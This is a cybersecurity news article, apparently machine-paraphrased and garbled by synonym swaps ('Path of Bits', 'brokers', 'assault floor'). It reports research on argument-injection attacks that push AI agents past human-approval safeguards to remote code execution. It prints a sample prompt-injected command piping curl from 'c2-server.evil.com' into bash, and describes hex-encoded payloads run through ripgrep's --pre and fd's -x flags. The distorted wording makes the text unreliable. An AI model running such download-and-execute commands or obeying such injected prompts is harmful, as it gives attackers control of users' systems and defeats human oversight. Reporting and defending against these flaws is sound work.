A vital argument injection flaw in three unnamed in style AI agent platforms allows attackers to bypass human approval safeguards and obtain distant code execution (RCE) by seemingly innocuous prompts.
In line with Path of Bits, these vulnerabilities exploit pre-approved system instructions designed for effectivity in duties like file searches and code evaluation, highlighting a widespread design flaw in agentic AI methods.
AI brokers depend on native instruments similar to discover, grep, git, and go check to deal with filesystem operations and model management with out reinventing performance, providing advantages in efficiency, reliability, and improvement pace.
Nevertheless, these pre-approved instructions create an assault floor when consumer inputs affect arguments, permitting argument injection as outlined by CWE-88.
Methods usually validate instructions towards allowlists however neglect argument flags, making blanket blocking impractical as a result of huge parameter areas of utilities.
As an example, a simplified Go perform checks if a command like “grep” is secure however appends user-provided arguments unchecked, leaving room for exploitation.
This antipattern persists as a result of selective filtering calls for exhaustive information of command choices, a problem amplified by AI’s dynamic nature.
In a single CLI-based agent, attackers crafted a immediate to run “go check -exec ‘bash -c “curl c2-server.evil.com?unittest= | bash; echo success”‘”, leveraging the -exec flag to introduce unauthorized curl and bash instructions, leading to RCE with out approval.
One other instance bypassed regex filters through the use of git present with hex-encoded payloads to create a file, adopted by ripgrep’s –pre flag to execute it, all by JSON-formatted prompts that nudged the mannequin towards device use, based on Path of Bits.
Assault Patterns
A facade sample vulnerability in a 3rd system appended malicious flags like “-x=python3” to an fd command, executing a pre-created Python payload with os.system for arbitrary actions.
These one-shot assaults, embeddable in code feedback or repositories, draw from “residing off the land” methods cataloged in GTFOBins and LOLBAS initiatives.
Prior disclosures, together with Johann Rehberger’s August 2025 writeups on Amazon Q command injection and CVEs like CVE-2025-54795 in Claude Code, echo these dangers.
To counter these threats, researchers advocate sandboxing as the first protection, utilizing containers, WebAssembly, or OS-level isolation like Seatbelt on macOS to restrict agent entry.
For facade patterns, at all times insert argument separators like “–” earlier than consumer inputs and disable shell execution with strategies like subprocess.run(shell=False).
Protected command allowlists stay flawed with out sandboxes, as instruments like discover allow code execution through flags, urging audits towards LOLBAS sources.
Builders ought to implement logging, cut back allowlists, and reintroduce human loops for suspicious chains; customers should limit entry and use containers for untrusted inputs.
Safety engineers can map instruments through prompts or documentation, fuzz flags, and evaluate towards exploit databases. As agentic AI proliferates, these coordinated disclosures sign a shift towards prioritizing safety earlier than entrenchment.
Observe us on Google Information, LinkedIn, and X for day by day cybersecurity updates. Contact us to function your tales.
